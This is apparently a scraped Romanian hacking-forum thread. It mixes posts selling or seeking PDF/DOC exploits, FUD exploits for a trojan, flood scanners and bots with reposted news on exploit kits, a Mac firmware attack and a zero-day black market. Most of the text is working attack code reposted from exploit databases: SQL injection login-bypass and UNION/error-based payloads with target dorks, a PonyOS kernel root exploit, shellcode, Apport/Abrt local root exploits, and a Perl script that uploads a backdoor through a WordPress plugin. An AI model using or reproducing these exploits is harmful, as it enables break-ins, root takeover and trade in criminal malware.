Search the Community

VAND ROOT FLOOD SCAN ARHIVE FLOOD SCAN BOTI PERLI PMA EXPLOIT SV CS SI ALTELECINE VREA LASATI REPLY aici la topic mai repede;)

Scan: https://www.sendspace.com/file/cqn4y2

Exploit Kits: Past, Present and Future March 16, 2015 View research paper: The Evolution of Exploit Kits Exploit kits are a fast-growing online threat that cybercriminals seem to have favored in the last few years to execute Web-based attacks to distribute malware. Exploit kits are old tools released by Russian programmers dating back to 2006. As seen in the diagram below, exploit kits have continuously grown in numbers from 2006 to 2013. The market seemingly changed and took a significant dip however in 2014. The rise of exploit kits in underground markets push exploit kit developers to improve the stealth and efficiency of their products and services. Currently, there are 70 different exploit kits found in the wild, taking advantage of more than a hundred vulnerabilities. What is an Exploit Kit? Exploit kits are programs or more often scripts that exploit vulnerabilities in programs or applications. The most prevalent exploits are browser exploits that enable the download of malicious files. Exploits introduce code to victims’ computers that then downloads and executes a malicious file. Several kits have since been developed and sold or rented out like commercial products in underground markets. The easiest hack toolkit made available in the crimeware market on record was seen sometime in 2006. A typical exploit kit usually provides a management console, several vulnerabilities targeted to different applications, and several add-on functions that make it easier for a cybercriminal to launch an attack. The Timeline Record of Exploit Kits The following research paper discusses the following: Exploit Kit Attack Scenario – there are four stages that illustrate how a typical attack scenario happens. Detailed below, the stages include contact, redirect, exploit, and finally, infect. Overview of 2014 Exploit Kit Activity – this section discusses the exploit kit trends traced back from 2006 to 2014, including its threat distribution. Exploit Kits are presently one of the most popular types of Web attack toolkits thriving in the cybercriminal underground market, and we predict that exploit kits will be more prevalent in 2015. Internet Explorer, Adobe Flash, and Adobe Reader are the most common software targeted by cybercriminals. Exploit kits pose serious security risks to all computer users ranging from private users to corporate networks. As such, it is critical to know and understand how exploit kits work, where they came from, what are the current trends, and how to defend against them. NO-MERCY Regards Source : Exploit Kits: Past, Present and Future - Security News - Trend Micro USA

<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> | Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability | | Date: 06.13.2015 | | Exploit Daddy: Walid Naceri | | Vendor Homepage: http://milw0rm.sourceforge.net/ | | Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download | | Version: v1.0 | | Tested On: Kali Linux, Mac, Windows | |><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><| | Website exploiter: WwW.security-Dz.Com | | CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA | | Sorry: Sorry pancaker, you missed that one | <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ### vuln codez admin/login.php ### <? $usr = htmlspecialchars(trim($_POST['usr'])); ---- what are you doing? $pwd = htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer? if($usr && $pwd){ $login = mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';"); $row = mysql_num_rows($login); ----Bla Bla Bla-------- ### manual ### Go to the login admin panel Exploit 1: USER: ADMIN' OR ''=' PASS: ADMIN' OR ''=' Exploit 2: USER: ADMIN' OR 1=1# PASS: Anything Bro ### How to fix, learn bro some php again ### $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['usr']))); $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['pwd']))); Source

# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit # Google Dork: [if applicable] # Date: 29th June 2015 # Exploit Author: HackerFantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: [app version] PonyOS <= 3.0 # Tested on: PonyOS 3.0 # CVE : N/A # Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c /* PonyOS <= 3.0 tty ioctl() root exploit ======================================== PonyOS 0.4.99-mlp had two kernel vulnerabilities disclosed in April 2013 that could be leveraged to read/write arbitrary kernel memory. This is due to tty winsize ioctl() allowing to read/write arbitrary memory. This exploit patches the setuid system call to remove a root uid check allowing any process to obtain root privileges. John Cartwright found these flaws and others here: https://www.exploit-db.com/exploits/24933/ Written for educational purposes only. Enjoy! -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/ioctl.h> int main(){ struct winsize ws; printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n"); memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8); ioctl(0, TIOCSWINSZ, &ws); ioctl(0, TIOCGWINSZ, (void *)0x0010f101); printf("[-] patched sys_setuid()\n"); __asm("movl $0x18,%eax"); __asm("xorl %ebx,%ebx"); __asm("int $0x7F"); printf("[-] Got root?\n"); system("/bin/sh"); } Source @Byte-ul nu am timp sa fac demo si nici "resursele necesare" am sa inchid thread-ul pentru a evita offtopic-ul.

Hack allows firmware to be rewritten right after older Macs awake from sleep. acs older than a year are vulnerable to exploits that remotely overwrite the firmware that boots up the machine, a feat that allows attackers to control vulnerable devices from the very first instruction. The attack, according to a blog post published Friday by well-known OS X security researcher Pedro Vilaca, affects Macs shipped prior to the middle of 2014 that are allowed to go into sleep mode. He found a way to reflash a Mac's BIOS using functionality contained in userland, which is the part of an operating system where installed applications and drivers are executed. By exploiting vulnerabilities such as those regularly found in Safari and other Web browsers, attackers can install malicious firmware that survives hard drive reformatting and reinstallation of the operating system. The attack is more serious than the Thunderstrike proof-of-concept exploit that came to light late last year. While both exploits give attackers the same persistent and low-level control of a Mac, the new attack doesn't require even brief physical access as Thunderstrike did. That means attackers half-way around the world may remotely exploit it. "BIOS should not be updated from userland and they have certain protections that try to mitigate against this," Vilaca wrote in an e-mail to Ars. "If BIOS are writable from userland then a rootkit can be installed into the BIOS. BIOS rootkits are more powerful than normal rootkits because they work at a lower level and can survive any machine reinstall and also BIOS updates." You will go into a deep sleep Vilaca's exploit works by attacking the BIOS protections immediately after a Mac restarts from sleep mode. Normally, the protection—known as FLOCKDN—allows userland apps read-only access to the BIOS region. For reasons that aren't clear to the researcher, that FLOCKDN protection is deactivated after a Mac wakes from sleep mode. That leaves the firmware open to apps that rewrite the BIOS, a process typically known as reflashing. From there, attackers can modify the machine's extensible firmware interface (EFI), the firmware responsible for starting a Mac's system management mode and enabling other low-level functions before loading the OS. "The flash is unlocked and now you can use flashrom to update its contents from userland, including EFI binaries," Friday's blog post stated, referring to the freely available utility for reading, writing, erasing, and verifying firmware contained in flash chips. "It means Thunderstrike like rootkit strictly from userland." To work, an exploit would require a vulnerability that provides the attacker with unfettered "root" access to OS X resources. Such vulnerabilities aren't always easy to find, but they're by no means impossible, as demonstrated by the Rootpipe privilege escalation bug that came to light late last year. Vilaca said a drive-by exploit planted on a hacked or malicious website could be used to trigger the BIOS attack. "The bug can be used with a Safari or other remote vector to install an EFI rootkit without physical access," Vilaca wrote. "The only requirement is that a suspended happened [sic] in the current session. I haven’t researched but you could probably force the suspend and trigger this, all remotely. That’s pretty epic ownage ;-)." An attacker could add code that deliberately sends a targeted Mac into sleep, or the exploit could be programmed to detonate the BIOS payload the next time a machine comes out of sleep mode. In either case, once the Mac awakes it would be possible for the attacker to bypass OS X firmware protections and rewrite the BIOS. "An exploit could either verify if the computer already went previously into sleep mode and it's exploitable, it could wait until the computer goes to sleep, or it can force the sleep itself and wait for user intervention to resume the session," Vilaca told Ars. "I'm not sure most users would suspect anything fishy is going on if their computer just goes to sleep. That is the default setting anyway on OS X." As was the case with Thunderstrike, Vilaca said he doesn't think his attack is likely to be exploited on a mass scale. Instead, it would likely be exploited only in highly targeted attacks, say those carried out against high-value targets the attackers know and have a high interest in. Vilaca said he has confirmed his attack works against a MacBook Pro Retina, a MacBook Pro 8.2 and a MacBook Air, all of which ran the latest available EFI firmware from Apple. He said Macs released since mid to late 2014 appear to be immune to the attacks. He said he wasn't sure if Apple silently patched the vulnerability on newer machines or if it was fixed accidentally. Ars has asked Apple for comment, but company officials generally don't discuss security issues until a fix has been released. At the moment, Vilaca said, there isn't much users of vulnerable machines can do to prevent exploits other than to change default OS X settings that put machines to sleep when not in use. More advanced users can download software made available by Trammell Hudson, creator of the Thunderstrike exploit. Available here and here, Hudson's software dumps the contents of a Mac's BIOS chip so users can compare the results against firmware files provided by Apple. This safeguard doesn't prevent users from having their Mac firmware rewritten, but it will alert them if such an attack has occurred. "I asked Apple to start publishing these files and their signatures so we can have a good baseline to compare against," Vilaca wrote in his blog post. "Hopefully they will do this one day. I built some tools for this purpose but they aren't public." While the attack isn't likely to be exploited on a mass scale, it's also not hard for people with above-average skill to carry it out. The technique joins a growing roster of attacks that rewrite firmware with a malicious replacement. Besides Thunderstrike, such exploits include BadUSB and attacks against VoIP phones, home and small office routers, and hacks tied to the National Security Agency that hid inside the firmware of hard disk drives. Given the inability of most current security products to detect malicious firmware, such attacks could one day represent a significant threat unless manufacturers devise ways to ensure the authenticity of the firmware powering the devices they sell. "We need to think different and start a trust chain from hardware to software," Vilaca wrote. "Everyone is trying to solve problems starting from software when the hardware is built on top of weak foundations. Apple has a great opportunity here because they control their full supply chain and their own designs. I hope they finally see the light and take over this great opportunity." Headline updated to remove the word "remote" since the hack involves use of a local exploit. Source

Vand ceea ce zice titlul. 1. PDF exploit 30 dolari 2. DOC exploit 30 dolari Faceti plata 19suh4bEgFvFMdcUeDL6kKAjkdSy4V6S4w dupa care imi trimiteti mesaj cu adresa voastra de btc si linkul pentru dw executabilului

Caut un pdf exploit pt un trojan si un java dive fud. Va rog pm cu pretuile, repet trebuie sa fie fud.

Introduction Black markets deployed on anonymizing networks such as Tor and I2P offer all kinds of illegal products, including drugs and weapons. They represent a pillar of the criminal ecosystem, as these black markets are the privileged places to acquire illegal goods and services by preserving the anonymity of both sellers and buyers and making it difficult to track payment transactions operated through virtual currencies like Bitcoin. The majority of people ignore that one of the most attractive goods in the underground market are zero-day exploits, malicious codes that could be used by hackers to exploit unknown vulnerabilities in any kind of software. The availability of zero-day exploits is a key element for a successful attack. The majority of state-sponsored attacks that go undetected for years rely on the exploitation of an unknown flaw in popular products on the market and SCADA systems. Zero-day exploits: A precious commodity Security experts have debated on several occasions the importance of the zero-day exploitation to design dangerous software that could target any kind of application. Zero-day exploits are among the most important components of any cyber weapons, and for this reason they are always present in the cyber arsenals of governments. Zero-day exploits could be used by threat actors for sabotage or for cyber espionage purposes, or they could be used to hit a specific category of software (i.e. mobile OSs for surveillance, SCADA application within a critical infrastructure). In some cases, security experts have discovered large scale operations infecting thousands of machines by exploiting zero-day vulnerabilities in common applications (e.g. Java platform, Adobe software). A few days ago, for example, security experts at FireEye detected a new highly targeted attack run by the APT28 hacking crew exploiting two zero-day flaws to compromise an “international government entity.” In this case, the APT28 took advantage of zero-day vulnerabilities in Adobe Flash software (CVE-2015-3043) and a Windows operating system (CVE-2015-1701). Zero-day exploits are commodities in the underground economy. Governments are the primary buyers in the growing zero-day market. Governments aren’t the only buyers however, exploit kits including zero-day are also acquired by non-government actors. In 2013 it was estimated that the market was able to provide 85 exploits per day, a concerning number for the security industry, and the situation today could be worse. It has been estimated that every year, zero-day hunters develop a combined 100 exploits, resulting in 85 privately known exploits, and this estimation does not include the data related to independent groups of hackers, whose activities are little known. Zero-day hunters are independent hackers or security firms that analyze every kind of software searching for a vulnerability. Then this knowledge is offered in black marketplaces to the highest bidder, no matter if it is a private company that will use it against a competitor or a government that wants to use it to target the critical infrastructure of an adversary. A study conducted by the experts at NSS Labs in 2013 titled “The Known Unknowns” reported that every day during a period of observation lasting three years, high-paying buyers had access to at least 60 vulnerabilities targeting common software produced by Adobe, Apple, Microsoft and Oracle. “NSS Labs has analyzed ten years of data from two major vulnerability purchase programs, and the results reveal that on any given day over the past three years, privileged groups have had access to at least 58 vulnerabilities targeting Microsoft, Apple, Oracle, or Adobe. Further, it has been found that these vulnerabilities remain private for an average of 151 days. These numbers are considered a minimum estimate of the ‘known unknowns’, as it is unlikely that cyber criminals, brokers, or government agencies will ever share data about their operations. Specialized companies are offering zero-day vulnerabilities for subscription fees that are well within the budget of. A determined attacker (for example, 25 zero-days per year for USD $2.5 million); this has broken the monopoly that nation states historically have held regarding ownership of the latest cyber weapon technology. Jointly, half a dozen boutique exploit providers have the capacity to offer more than 100 exploits per year.” On the black market, a zero-day exploit for a Windows OS sells for up to $250,000 according to BusinessWeek, a good incentive for hackers to focus their efforts in the discovery of this category of vulnerabilities. The price could increase in a significant way if the bugs affect critical systems and the buyer is a government that intends to use it for Information Warfare. What is very concerning is that in many cases, the professionals who discover a zero-day, in order to maximize gains, offer their knowledge to hostile governments who use it also to persecute dissidents or to attack adversary states. The zero-day market follows its own rules, the commodities are highly perishable, the transactions are instantaneous, and the agreement between buyers and sellers is critical. “According to a recent article in The New York Times, firms such as VUPEN (France), ReVuln (Malta), Netragard, Endgame Systems, and Exodus Intelligence (US) advertise that they sell knowledge of security vulnerabilities for cyber espionage. The average price lies between USD $40,000 and USD $160,000. Although some firms restrict their clientele, either based on country of origin or on decisions to sell to specific governments only, the ability to bypass this restriction through proxies seems entirely possible for determinedcyber criminals. Based on service brochures and public reports, these providers can deliver at least 100 exclusive exploits per year,” states the report. In particular, the US contractor Endgame Systems reportedly offers customers 25 exploits a year for $2.5 million. The uncontrolled and unregulated market of zero-day exploits pose a real threat for any industry. For this reason, security experts and government agencies constantly monitor its evolution. The zero-day market in the Deep Web: “TheRealDeal” marketplace Zero-day exploits have been available in several underground Deep Web marketplaces for a long time, and it is not difficult to find malicious codes and exploit kits in different black markets or hacking forums. Recently a new black market dubbed TheRealDeal has appeared in the Deep Web. The platform was designed to provide both sellers and buyers a privileged environment for the commercialization of precious goods. Figure – TheRealDeal Marketplace TheRealDeal (http://trdealmgn4uvm42g.onion) service appeared last month and it is focused on the commercialization of zero-day exploits. The singular marketplace is hosted on the popular Tor network to protect the anonymity of the actors involved in the sale of the precious commodity. The market offers zero-day exploits related to still unknown flaws and one-day exploits that have been already published, but are modified to be undetectable by defensive software. Figure – One-day private exploits The operators also offer one-day private exploits with known CVEs, but for which the code was never released. They also anticipated that a seller specialized in exploits for the GSM platform will soon offer a listing for some very interesting hardware. Who is behind TheRealDeal? The ‘deepdotweb’ website published an interview with one of the administrators of the black market who explained that the project is operated by four cyber experts with significant experience dealing in the “clearnet when it comes to zero-day exploit code, databases and so on.” The administrator explained that the greatest risk in commercializing zero-day exploits is that in the majority of cases, the code does not work or simply the sellers are scammers. Another factor that convicted the administrators to launch the TheRealDeal zero-day marketplace is the consideration that the places where it is possible to find the precious goods are not always easy to reach. There are some IRC servers that are not easy to find or that request an invitation. Differently, TheRealDeal wants to be an ‘open-market’ focused on zero-days. The four experts decided to launch the hidden service to create a marketplace where people can trade zero-day exploits without becoming a victim of fraud and while staying in total anonymity. “We started off by using BitWasp, fully aware of its history and flaws, but since we have years of hands-on experience in the security industry and not much in web-design we decided it would be a good platform since we can make our own security assessments and patches while the whole multi-sig seems to work perfect. We also wanted to avoid involving other people in the project for obvious reasons and that was another reason why not to hire a web designer etc… although we might hire one off the darknet soon, just to improve the UI a little,” said one of the administrators. Below is the list of products available on the TheRealDeal marketplace: 0-Day exploits (4) FUD Exploits (4) 1Day Private Exploits (1) Information (5) Money (36) Source Code (4) Spam (3) Accounts (7) Cards Other Tools (3) RATs (1) Hardware (2) Drugs Misc (6) Pharmacy (12) Cannabis (5) LSD (1) Shrooms (2) MDMA (6) Speed (5) Services (8) Weapons Hot (1) Cold (6) CNC Analyzing the product listing of TheRealDeal Market, it is possible to note the availability of zero-day exploits, which are source codes that could be used by hackers in cyber attacks, and of course any kind of hacking tool. The list is still short because the market is still in an embryonic stage, but the policy of its directors is clear. “Welcome…We originally opened this market in order to be a ‘code market’ — where rare information and code can be obtained,” a message from the website’s anonymous administrator reads. “Completely avoid the scam/scum and enjoy the real code, real information and real products.” Among the products there is a new method of hacking Apple iCloud accounts and exploit kits that could be used to compromise WordPress-based websites and both mobile and desktop OSs (i.e. Android and Windows). The price tag for the iCloud hack is $17,000, and as explained by the seller, it is possible to compromise any account. The buyer could pay in Bitcoin to make their identification difficult. “Any account can be accessed with a malicious request from a proxy account,” reads the description of the hack available on TheRealDeal marketplace. “Please arrange a demonstration using my service listing to hack an account of your choice.” Figure – Zero-day exploits The listing also includes an Internet Explorer attack that is offered for $8,000 in Bitcoin, as reported by Wired in a blog post: “Others include a technique to hack WordPress’ multisite configuration, an exploit against Android’s Webview stock browser, and an Internet Explorer attack that claims to work on Windows XP, Windows Vista and Windows 7, available for around $8,000 in bitcoin … Found 2 months ago by fuzzing,” the seller writes, referring to an automated method of testing a program against random samples of junk data to see when it crashes. “0day but might be exposed, can’t really tell without risking a lot of money,” the seller adds. “Willing to show a demo via the usual ways, message me but don’t waste my time!” The list of products has been recently updated. It also includes an exploit for the MS15-034 Microsoft IIS Remote Code Execution vulnerability, a flaw that is being actively exploited in the wild against Windows 7, 8, and 8.1, Windows Server 2008 R2, 2012, and 2012 R2. TheRealDeal market also offers other products very common in the criminal ecosystem, including drugs, weapons, and Remote Access Trojan (RAT). The operators also created a specific “services” category with the intent to attract high-profile black hats offering their hacking services (i.e. Email account takeover, DDoS services, data theft, hacking campaign). The Information category was created for sellers that offer any kind of information, documents, databases, secret keys, and similar products. TheRealDeal doesn’t implement a real escrow model; instead it adopts a multi-signature model to make any financial transaction effective. Basically, the buyer, the seller and the administrators control the amount of Bitcoin to transfer together, and any transaction needs the signature of two out of the three parties before funds are transferred. The administrators decided to implement multisig transactions because their marketplace is very young and without reputation. This means that people has no incentive to deposit a sum of money for something that they are not able to verify. It is curious to note that the marketplace also offers drugs due to high demand, but according to the administrators they might consider removing them in the future. There is also a “services” category – anything can go there, but we are hoping for some high quality blackhats to come forward and offer their services, anything from obtaining access to an email and getting a certain document and up to long term campaigns. The hardware category is for toys like fake cellular base stations and other physical ‘hacking’ tools. The information category is for any kind of information, documents, databases, secret keys, etc. In the following table are the principal product categories offered in the market and their prices. 0-Day exploits Apple id / iCloud remote exploit USD 17025,52 Internet Explorer <= 11 USD 7840,70 Android WebView 0day RCE USD 8176,73 WordPress MU RCE USD 1008,09 Category: FUD Exploits FUD .js download and execute USD 291,23 Adobe Flash < 16.0.0.296 (CVE-2015-0313) USD 560,05 Adobe Flash < 16.0.0.287 (CVE-2015-0311) USD 560,05 Category: 1Day Private Exploits MS15-034 Microsoft IIS Remote USD 42313,18 Category: Hardware A5/1 Encryption Rainbow Tables USD 67,21 Category: Source Code Banking malware source code USD 2,11 Alina POS malware full source code USD 0,92 Exploit Kits Source Code USD 1,82 “Start your own maket” code and server USD 7959,43 I’ll keep you updated on the evolution of the TheRealDeal marketplace in the next weeks. References http://securityaffairs.co/wordpress/36098/cyber-crime/therealdeal-black-marketplace-exploits.html http://www.wired.com/2015/04/therealdeal-zero-day-exploits/ http://securityaffairs.co/wordpress/14561/malware/zero-day-market-governments-main-buyers.html https://www.nsslabs.com/reports/known-unknowns-0 http://www.deepdotweb.com/2015/04/08/therealdeal-dark-net-market-for-code-0days-exploits/ Source

/* +======================================================================================== | # Exploit Title : linux/x86 setreuid(0, 0) + execve("/sbin/halt") + exit(0) - 49 bytes | # Exploit Author : Febriyanto Nugroho | # Tested on : Linux Debian 5.0.5 +======================================================================================== */ #include <stdio.h> #include <string.h> char s[] = "\x31\xc0\x31\xdb\x50\x53\x89\xe1" "\xb0\x46\xcd\x80\x31\xc0\x50\x68" "\x68\x61\x6c\x74\x68\x6e\x2f\x2f" "\x2f\x68\x2f\x73\x62\x69\x89\xe3" "\x50\x53\xb0\x0b\x89\xe1\xcd\x80" "\x31\xc0\x50\x89\xe3\xb0\x01\xcd" "\x80"; int main(int argc, char *argv[]) { printf("shellcode length -> %d bytes\n", strlen(s)); int(*fuck)() = (int(*)())s; fuck(); return 0; } Source

[CVE-2015-1318,CVE-2015-1862] Apport/Abrt Local Root Exploit #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <elf.h> #include <err.h> #include <syslog.h> #include <sched.h> #include <linux/sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/auxv.h> #include <sys/wait.h> # warning this file must be compiled with -static // // Apport/Abrt Vulnerability Demo Exploit. // // Apport: CVE-2015-1318 // Abrt: CVE-2015-1862 // // -- taviso@cmpxchg8b.com, April 2015. // // $ gcc -static newpid.c // $ ./a.out // uid=0(root) gid=0(root) groups=0(root) // sh-4.3# exit // exit // // Hint: To get libc.a, // yum install glibc-static or apt-get install libc6-dev // int main(int argc, char **argv) { int status; Elf32_Phdr *hdr; pid_t wrapper; pid_t init; pid_t subprocess; unsigned i; // Verify this is a static executable by checking the program headers for a // dynamic segment. Originally I thought just checking AT_BASE would work, // but that isnt reliable across many kernels. hdr = (void *) getauxval(AT_PHDR); // If we find any PT_DYNAMIC, then this is probably not a static binary. for (i = 0; i < getauxval(AT_PHNUM); i++) { if (hdr[i].p_type == PT_DYNAMIC) { errx(EXIT_FAILURE, "you *must* compile with -static"); } } // If execution reached here, it looks like we're a static executable. If // I'm root, then we've convinced the core handler to run us, so create a // setuid root executable that can be used outside the chroot. if (getuid() == 0) { if (chown("sh", 0, 0) != 0) exit(EXIT_FAILURE); if (chmod("sh", 04755) != 0) exit(EXIT_FAILURE); return EXIT_SUCCESS; } // If I'm not root, but euid is 0, then the exploit worked and we can spawn // a shell and cleanup. if (setuid(0) == 0) { system("id"); system("rm -rf exploit"); execlp("sh", "sh", NULL); // Something went wrong. err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked"); } // It looks like the exploit hasn't run yet, so create a chroot. if (mkdir("exploit", 0755) != 0 || mkdir("exploit/usr", 0755) != 0 || mkdir("exploit/usr/share", 0755) != 0 || mkdir("exploit/usr/share/apport", 0755) != 0 || mkdir("exploit/usr/libexec", 0755) != 0) { err(EXIT_FAILURE, "failed to create chroot directory"); } // Create links to the exploit locations we need. if (link(*argv, "exploit/sh") != 0 || link(*argv, "exploit/usr/share/apport/apport") != 0 // Ubuntu || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) { // Fedora err(EXIT_FAILURE, "failed to create required hard links"); } // Create a subprocess so we don't enter the new namespace. if ((wrapper = fork()) == 0) { // In the child process, create a new pid and user ns. The pid // namespace is only needed on Ubuntu, because they check for %P != %p // in their core handler. On Fedora, just a user ns is sufficient. if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0) err(EXIT_FAILURE, "failed to create new namespace"); // Create a process in the new namespace. if ((init = fork()) == 0) { // Init (pid 1) signal handling is special, so make a subprocess to // handle the traps. if ((subprocess = fork()) == 0) { // Change /proc/self/root, which we can do as we're privileged // within the new namepace. if (chroot("exploit") != 0) { err(EXIT_FAILURE, "chroot didnt work"); } // Now trap to get the core handler invoked. __builtin_trap(); // Shouldn't happen, unless user is ptracing us or something. err(EXIT_FAILURE, "coredump failed, were you ptracing?"); } // If the subprocess exited with an abnormal signal, then everything worked. if (waitpid(subprocess, &status, 0) == subprocess) return WIFSIGNALED(status) ? EXIT_SUCCESS : EXIT_FAILURE; // Something didn't work. return EXIT_FAILURE; } // The new namespace didn't work. if (waitpid(init, &status, 0) == init) return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS ? EXIT_SUCCESS : EXIT_FAILURE; // Waitpid failure. return EXIT_FAILURE; } // If the subprocess returned sccess, the exploit probably worked, reload // with euid zero. if (waitpid(wrapper, &status, 0) == wrapper) { // All done, spawn root shell. if (WIFEXITED(status) && WEXITSTATUS(status) == 0) { execl(*argv, "w00t", NULL); } } // Unknown error. errx(EXIT_FAILURE, "unexpected result, cannot continue"); } Apport - Local Linux Root #!/bin/sh # # CVE-2015-1318 # # Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758 # # Example: # # % uname -a # Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux # # % lsb_release -a # No LSB modules are available. # Distributor ID: Ubuntu # Description: Ubuntu 14.04.2 LTS # Release: 14.04 # Codename: trusty # # % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 " " $3 }' # apport 2.14.1-0ubuntu3.8 # # % id # uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...) # # % ./apport.sh # pwned-4.3# id # uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...) # pwned-4.3# exit TEMPDIR=$(mktemp -d) cd ${TEMPDIR} cp /bin/busybox . mkdir -p dev mnt usr/share/apport ( cat << EOF #!/busybox sh ( cp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned chmod 5755 /mnt/1/root/tmp/pwned ) EOF ) > usr/share/apport/apport chmod +x usr/share/apport/apport ( cat << EOF mount -o bind . . cd . mount --rbind /proc mnt touch dev/null pivot_root . . ./busybox sleep 500 & SLEEP=\$! ./busybox sleep 1 ./busybox kill -11 \$SLEEP ./busybox sleep 5 EOF ) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \ lxc-unshare -s "MOUNT|PID|NETWORK|UTSNAME|IPC" -- /bin/sh 2>&1 >/dev/null /tmp/pwned -p rm -Rf ${TEMPDIR}

###################################################################### # Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload # Google Dork: inurl:/plugins/php-event-calendar/ # Date: 02.04.2015 # Exploit Author: CrashBandicot (@DosPerl) # Source Plugin: https://wordpress.org/plugins/php-event-calendar/ # Vendor HomePage: http://phpeventcalendar.com/ # Version: 1.5 # Tested on: MSwin ###################################################################### # Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php # Vulnerable File : uploadify.php <?php /* Uploadify Copyright (c) 2012 Reactive Apps, Ronnie Garcia Released under the MIT License <http://www.opensource.org/licenses/mit-license.php> */ // Define a destination //$targetFolder = '/uploads'; // Relative to the root $targetFolder = $_POST['targetFolder']; // wp upload directory $dir = str_replace('\\','/',dirname(__FILE__)); //$verifyToken = md5('unique_salt' . $_POST['timestamp']); if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; //$targetPath = $dir.$targetFolder; $targetPath = $targetFolder; $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name']; $targetFile = rtrim($targetPath,'/') . '/' . $fileName; // Validate the file type $fileTypes = array('jpg','jpeg','gif','png'); // File extensions $fileParts = pathinfo($_FILES['Filedata']['name']); if (in_array($fileParts['extension'],$fileTypes)) { move_uploaded_file($tempFile,$targetFile); echo '1'; } else { echo 'Invalid file type.'; } } ?> # Exploit #!/usr/bin/perl use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\t +===================================================\n"; print "\t | PHP event Calendar Plugin - Arbitrary File Upload \n"; print "\t | Author: CrashBandicot\n"; print "\t +===================================================\n\n"; die "usage : perl $0 backdoor.php.gif" unless $ARGV[0]; $file = $ARGV[0]; my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},); my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content; if($ch = ~/1/) { print "\n [+] File Uploaded !"; } else { print "\n [-] Target not Vuln"; } __END__ # Path Shell : http://localhost/0day_backdoor.php.gif Source

Advisory: SQLi-vulnerabilities in aplication CMS WebDepo Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014) Vendor URL: http://www.webdepot.co.il Vendor Status: 0day ========================== Vulnerability Description: ========================== Records and client practice management application CMS WebDepo suffers from multiple SQL injection vulnerabilitie ========================== Technical Details: ========================== SQL can be injected in the following GET GET VULN: wood=(id) $wood=intval($_REQUEST['wood']) ========================== SQL injection vulnerabilities ========================== Injection is possible through the file text.asp Exploit-Example: DBMS: 'MySQL' Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) DBMS: 'Microsoft Access' Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16 Ex: http://target.us/text.asp?wood=(id)+Exploit ========================== SCRIPT EXPLOIT ========================== http://pastebin.com/b6bWuw7k --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php WebDepoxpl.php -t target php WebDepoxpl.php -f targets.txt php WebDepoxpl.php -t target -p 'http://localhost:9090' howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html ========================== GOOGLE DORK ========================== inurl:"text.asp?wood=" site:il inurl:"text.asp?wood=" site:com inurl:"text.asp?wood=" ========================== Solution: ========================== Sanitizing all requests coming from the client ========================== Credits: ========================== AUTOR: Cleiton Pinheiro / Nick: googleINURL Blog: http://blog.inurl.com.br Twitter: https://twitter.com/googleinurl Fanpage: https://fb.com/InurlBrasil Pastebin http://pastebin.com/u/Googleinurl GIT: https://github.com/googleinurl PSS: http://packetstormsecurity.com/user/googleinurl YOUTUBE: http://youtube.com/c/INURLBrasil PLUS: 